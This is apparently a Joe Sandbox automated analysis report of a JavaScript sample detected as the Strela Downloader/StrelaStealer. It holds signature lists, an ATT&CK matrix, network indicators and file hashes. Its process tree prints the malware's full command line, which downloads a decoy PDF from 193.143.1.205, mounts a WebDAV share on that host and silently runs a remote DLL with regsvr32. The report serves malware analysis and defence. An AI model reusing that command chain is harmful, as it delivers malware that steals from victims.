Windows
Analysis Report
98329724306712404.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7312 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\98329 7243067124 04.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7368 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\272 5515715212 0.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7376 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7420 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7608 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7824 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8080 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 80 --field -trial-han dle=1528,i ,117245542 2034623273 2,14745420 7117899811 32,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7892 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
10% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589006 |
Start date and time: | 2025-01-11 08:19:27 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 57s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 98329724306712404.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.16.168.107, 2.16.168.105, 2.23.240.205, 162.159.61.3, 172.64.41.3, 54.224.241.105, 50.16.47.176, 34.237.241.83, 18.213.11.84, 23.209.209.135, 2.22.50.131, 2.22.50.144, 184.28.90.27, 23.200.0.21, 23.200.0.33, 192.168.2.4, 20.109.210.53, 23.47.168.24, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
02:20:23 | API Interceptor | |
02:20:28 | API Interceptor | |
02:20:29 | API Interceptor | |
02:20:37 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073713497744712 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrR:KooCEYhgYEL0In |
MD5: | 071ED2388E66A033DBE11393BD530085 |
SHA1: | 5148D31D367EB14A6780D1E721ED509F812A388D |
SHA-256: | 34591B2A48AE86722CEE6CDC2D5235CBEBBFEB05BDB4EE7DF4251A132786A8BA |
SHA-512: | 492B4D5007EF3F7BF3349B9EBAB0F18E6888A7BECB3CD3C774EBEBEA24C06606CC3AF38718E58327A3A846C94EFE37EF7BF2AF50CA85D80C72FA550EBBB04BC3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4221771378401341 |
Encrypted: | false |
SSDEEP: | 1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO |
MD5: | 3F8A3666B004563FE906FA89370657D1 |
SHA1: | 0747431F0E813426C08B929B8286A4A7D8B4D5D1 |
SHA-256: | D9BC3D80499859CEF5D4AD17C31C2B93AE2CD85B1EC2E88F9F23A6BAE0362CD9 |
